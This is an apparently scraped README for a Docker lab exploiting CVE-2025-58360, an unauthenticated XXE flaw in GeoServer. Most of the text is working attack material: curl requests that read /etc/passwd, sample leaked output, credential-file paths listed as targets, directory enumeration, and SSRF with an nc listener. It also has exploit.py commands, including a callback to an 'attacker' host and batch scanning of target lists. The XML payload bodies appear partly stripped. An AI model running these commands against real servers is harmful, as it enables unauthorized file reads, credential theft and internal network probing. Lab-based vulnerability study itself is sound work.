Share
## https://sploitus.com/exploit?id=184C78DE-1DF5-53A2-8049-589E479FD4BF
# CVE-2025-58360: GeoServer XXE Lab
> **Unauthenticated XML External Entity (XXE) Injection in GeoServer OWS/WMS Services**
**CVSS:** 9.8 CRITICAL
**Affected:** SLDHandler.parse() |
| -> SLDParser.parseSLD() | File/SSRF
```
## Quick Start
```bash
# Start both vulnerable and patched instances
docker-compose up -d
# Vulnerable: http://localhost:8080/geoserver
# Patched: http://localhost:8081/geoserver
# Wait ~60 seconds for startup
```
**Default Credentials:** `admin` / `geoserver`
---
## Exploitation
### File Read
```bash
curl -s -X POST \
-H "Content-Type: text/xml" \
-d '
]>
&xxe;
' \
"http://localhost:8080/geoserver/ows?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90"
```
**Vulnerable Response:**
```xml
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```
**Patched Response:**
```xml
Entity resolution disallowed for file:///etc/passwd
```
### High-Value Targets
```
file:///opt/geoserver_data/security/usergroup/default/users.xml
file:///opt/geoserver_data/global.xml
```
### Directory Listing
Java's `file://` handler reads directories as newline-separated file lists:
```bash
# List root directory
python3 exploit.py -u http://localhost:8080 --file /
# Enumerate geoserver data
python3 exploit.py -u http://localhost:8080 --file /opt/geoserver_data/
python3 exploit.py -u http://localhost:8080 --file /opt/geoserver_data/security/
```
**Output:**
```
__cacert_entrypoint.sh
.dockerenv
bin
boot
dev
etc
home
...
```
This allows full filesystem enumeration before targeting specific files.
### SSRF
```bash
# Start listener
nc -lvnp 9999
# Send payload
curl -s -X POST \
-H "Content-Type: text/xml" \
-d '
]>
&xxe;
' \
"http://localhost:8080/geoserver/ows?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90"
```
---
## Using the Exploit Script
```bash
# Version check
python3 exploit.py -u http://localhost:8080
# Safe probe (no data exfil)
python3 exploit.py -u http://localhost:8080 --probe
# File read
python3 exploit.py -u http://localhost:8080 --file /etc/passwd
# SSRF
python3 exploit.py -u http://localhost:8080 --ssrf http://attacker:9999/callback
# Verbose mode
python3 exploit.py -u http://localhost:8080 --file /etc/passwd -v
# Batch scan
python3 exploit.py --list targets.txt --output vulnerable.txt
```
---
## Lab Contents
```
geoserver-xxe-lab/
โโโ README.md
โโโ docker-compose.yml
โโโ exploit.py
```
---
## Remediation
Upgrade to GeoServer 2.25.6+, 2.26.2+, or 2.27.0+
---
## Disclaimer
For authorized security testing and educational purposes only.
---
**El Perro Joke**